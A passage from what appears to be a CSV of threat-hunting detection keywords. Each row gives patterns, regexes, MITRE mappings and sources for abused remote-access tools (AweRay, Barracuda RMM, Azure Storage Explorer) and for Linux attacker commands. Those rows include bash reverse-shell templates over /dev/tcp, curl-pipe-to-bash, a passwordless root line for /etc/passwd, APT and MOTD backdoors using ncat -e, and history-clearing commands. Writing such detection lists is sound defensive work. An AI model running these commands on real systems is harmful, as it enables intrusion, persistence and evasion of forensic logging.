solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AweSun.exe*",".{0,1000}\\AweSun\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Aweray*",".{0,1000}\\Program\sFiles\\Aweray.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Software\AweSun\SunLogin\SunloginClient*",".{0,1000}\\Software\\AweSun\\SunLogin\\SunloginClient.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AweRay Limited<*",".{0,1000}\>AweRay\sLimited\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AweRay Pte. 
Ltd.<*",".{0,1000}\>AweRay\sPte\.\sLtd\.\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AweSun.exe<*",".{0,1000}\>AweSun\.exe\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>AweSun<*",".{0,1000}\>AweSun\<.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*asapi.aweray.net*",".{0,1000}asapi\.aweray\.net.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*as-tk.aweray.com*",".{0,1000}as\-tk\.aweray\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*as-tk.aweray.com/track*",".{0,1000}as\-tk\.aweray\.com\/track.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Aweray_Remote.exe*",".{0,1000}Aweray_Remote\.exe.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*awerayimg.com*",".{0,1000}awerayimg\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*client-api.aweray.com*",".{0,1000}client\-api\.aweray\.com.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://sun.aweray.com/*/download*",".{0,1000}https\:\/\/sun\.aweray\.com\/.{0,1000}\/download.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*install.bat AweSun*",".{0,1000}install\.bat\sAweSun.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh advfirewall firewall * rule name=""AweSun*",".{0,1000}netsh\s\sadvfirewall\sfirewall\s.{0,1000}\srule\sname\=\""AweSun.{0,1000}","greyware_tool_keyword","aweray","all-in-one secure remote access control and support solution","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","sun.aweray.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*iolonopooapdagdemdoaihahlfkncfgg*",".{0,1000}iolonopooapdagdemdoaihahlfkncfgg.{0,1000}","greyware_tool_keyword","Azino VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*/Microsoft Azure Storage Explorer.app*",".{0,1000}\/Microsoft\sAzure\sStorage\sExplorer\.app.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*/Microsoft Azure Storage Explorer.zip*",".{0,1000}\/Microsoft\sAzure\sStorage\sExplorer\.zip.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\Microsoft Azure Storage Explorer.zip*",".{0,1000}\\Microsoft\sAzure\sStorage\sExplorer\.zip.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*>Microsoft Azure Storage Explorer Setup<*",".{0,1000}\>Microsoft\sAzure\sStorage\sExplorer\sSetup\<.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - 
T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*>Microsoft Azure Storage Explorer<*",".{0,1000}\>Microsoft\sAzure\sStorage\sExplorer\<.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*036a9029e3b883ded8de9d9bdde3f63dd86d3403b7ed767b1efc3037c9d37bc4*",".{0,1000}036a9029e3b883ded8de9d9bdde3f63dd86d3403b7ed767b1efc3037c9d37bc4.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*7fa49a08d05a3616b5a24f52645d76c4496c37f5060a6bd4a648f534c4e85ae0*",".{0,1000}7fa49a08d05a3616b5a24f52645d76c4496c37f5060a6bd4a648f534c4e85ae0.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*c798b2aedc7a74f0daf51eb216aae8cb48b45f208b0409916442b1d61d2ad2ef*",".{0,1000}c798b2aedc7a74f0daf51eb216aae8cb48b45f208b0409916442b1d61d2ad2ef.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage 
Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A" "*com.microsoft.StorageExplorer*",".{0,1000}com\.microsoft\.StorageExplorer.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*Microsoft Azure Storage Explorer.app/Contents/*",".{0,1000}Microsoft\sAzure\sStorage\sExplorer\.app\/Contents\/.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*StorageExplorer-linux-x64.tar.gz*",".{0,1000}StorageExplorer\-linux\-x64\.tar\.gz.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*StorageExplorer-windows-x64.exe*",".{0,1000}StorageExplorer\-windows\-x64\.exe.{0,1000}","greyware_tool_keyword","Azure Storage Explorer","legitimate microsoft software - threat actors have been abusing Azure Storage Explorer for Data Exfiltration","T1030 - T1048 - T1078.004 - T1105 - T1567.001","TA0010","N/A","N/A","Data 
Exfiltration","https://azure.microsoft.com/en-us/products/storage/storage-explorer","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*.apitest.barracudamsp.com*",".{0,1000}\.apitest\.barracudamsp\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Applications/Managed Workplace/Onsite Manager/logs/*",".{0,1000}\/Applications\/Managed\sWorkplace\/Onsite\sManager\/logs\/.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\BRMM_2024.1-Release*",".{0,1000}\\BRMM_2024\.1\-Release.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MWDiagnosticCollector.exe*",".{0,1000}\\MWDiagnosticCollector\.exe.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\MWDiagnosticCollectorResult_*.zip*",".{0,1000}\\MWDiagnosticCollectorResult_.{0,1000}\.zip.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Barracuda 
RMM\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Barracuda\sRMM\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files (x86)\Level Platforms\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Level\sPlatforms\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Barracuda RMM\*",".{0,1000}\\Program\sFiles\\Barracuda\sRMM\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Program Files\Level Platforms\*",".{0,1000}\\Program\sFiles\\Level\sPlatforms\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\Barracuda MSP\*",".{0,1000}\\ProgramData\\Barracuda\sMSP\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Level Platforms\Managed Workplace\*",".{0,1000}\\SOFTWARE\\Level\sPlatforms\\Managed\sWorkplace\\.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 
- T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Barracuda MSP<*",".{0,1000}\>Barracuda\sMSP\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Barracuda Networks, Inc.*",".{0,1000}\>Barracuda\sNetworks,\sInc\..{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Barracuda RMM Setup AutoRun<*",".{0,1000}\>Barracuda\sRMM\sSetup\sAutoRun\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Barracuda RMM Setup<*",".{0,1000}\>Barracuda\sRMM\sSetup\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Barracuda RMM*<*",".{0,1000}\>Barracuda\sRMM.{0,1000}\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>LPI Level 
Platforms<*",".{0,1000}\>LPI\sLevel\sPlatforms\<.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Barracuda RMM Onsite Manager - InstallShield Wizard*",".{0,1000}Barracuda\sRMM\sOnsite\sManager\s\-\sInstallShield\sWizard.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Barracuda RMM Onsite Manager.msi*",".{0,1000}Barracuda\sRMM\sOnsite\sManager\.msi.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rmm.barracudamsp.com*",".{0,1000}rmm\.barracudamsp\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*whatsmyip.ccrmm.avg.com*",".{0,1000}whatsmyip\.ccrmm\.avg\.com.{0,1000}","greyware_tool_keyword","BarracudaRMM","Deliver remote support services - formerly AVG","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","N/A","RMM","https://www.barracudamsp.com/products/rmm/barracuda-rmm","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*| base64 -d *",".{0,1000}\|\sbase64\s\-d\s.{0,1000}","greyware_tool_keyword","base64","suspicious base64 commands used by the offensive tool traitor and other tools","T1140 - T1027","TA0005","N/A","N/A","Defense 
Evasion","N/A","1","0","N/A","FP risks","7","10","N/A","N/A","N/A","N/A" "*base64 -d /tmp/*",".{0,1000}base64\s\-d\s\/tmp\/.{0,1000}","greyware_tool_keyword","base64","suspicious base64 commands used by the offensive tool traitor and other tools","T1140 - T1027","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","FP risks","7","10","N/A","N/A","N/A","N/A" "*bash -c *curl *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}curl\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*bash -c *wget *.sh | bash*",".{0,1000}bash\s\-c\s.{0,1000}wget\s.{0,1000}\.sh\s\|\sbash.{0,1000}","greyware_tool_keyword","bash","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell","T1071 - T1071.004 - T1021","TA0002 - TA0011","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*bash -i >& /dev/tcp/*/* 0>&1*",".{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 
- T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*cat /dev/null > *bash_history*",".{0,1000}cat\s\/dev\/null\s\>\s.{0,1000}bash_history.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*echo * .bash_history*",".{0,1000}echo\s.{0,1000}\s\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*echo * /home/*/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/home\/.{0,1000}\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*echo * 
/root/.bash_history*",".{0,1000}echo\s.{0,1000}\s\/root\/\.bash_history.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*echo *::0:0::/root:/bin/bash* >>/etc/passwd*",".{0,1000}echo\s.{0,1000}\:\:0\:0\:\:\/root\:\/bin\/bash.{0,1000}\s\>\>\/etc\/passwd.{0,1000}","greyware_tool_keyword","bash","add a passwordless user ","T1136.001 - T1059.004 - T1078.004","TA0005 - TA0002 - TA0004","N/A","N/A","Persistence","N/A","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A" "*echo *APT::Update::Pre-Invoke *nohup ncat -lvp * -e /bin/bash * > /etc/apt/apt.conf.d/*",".{0,1000}echo\s.{0,1000}APT\:\:Update\:\:Pre\-Invoke\s.{0,1000}nohup\sncat\s\-lvp\s.{0,1000}\s\-e\s\/bin\/bash\s.{0,1000}\s\>\s\/etc\/apt\/apt\.conf\.d\/.{0,1000}","greyware_tool_keyword","bash","Backdooring APT","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*echo *bash -c *bash -i >& /dev/tcp/*/* >> /etc/update-motd.d/00-header*",".{0,1000}echo\s.{0,1000}bash\s\-c\s.{0,1000}bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","greyware_tool_keyword","bash","Backdooring Message of the Day","T1059.004 - T1574.001 - T1027","TA0002 - TA0005","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*exec /bin/sh 0&0 
2>&0*",".{0,1000}exec\s\/bin\/sh\s0\<\/dev\/tcp\/.{0,1000}\/.{0,1000}1\>\&0\s2\>\&0.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*exec 5<>/dev/tcp/*/**cat <&5 | while read line* do $line 2>&5 >&5* done*",".{0,1000}exec\s5\<\>\/dev\/tcp\/.{0,1000}\/.{0,1000}.{0,1000}cat\s\<\&5\s\|\swhile\sread\sline.{0,1000}\sdo\s\$line\s2\>\&5\s\>\&5.{0,1000}\sdone.{0,1000}","greyware_tool_keyword","bash","bash reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","10","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*export HISTFILE=/dev/null*",".{0,1000}export\sHISTFILE\=\/dev\/null.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","N/A","greyware tool - risks of False positive !","10","10","1882","482","2024-08-29T19:24:49Z","2020-06-17T21:48:18Z" "*export HISTFILESIZE=0*",".{0,1000}export\sHISTFILESIZE\=0.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","N/A","greyware tool - risks of False positive !","10","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*HISTCONTROL=ignoredups:ignorespace*",".{0,1000}HISTCONTROL\=ignoredups\:ignorespace.{0,1000}","greyware_tool_keyword","bash","use a space in front of your bash command and it won't be logged with the following option","T1070.004 - T1562.001","TA0005 ","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive ! Misconfiguration","8","10","N/A","N/A","N/A","N/A" "*history -c*",".{0,1000}history\s\-c.{0,1000}","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 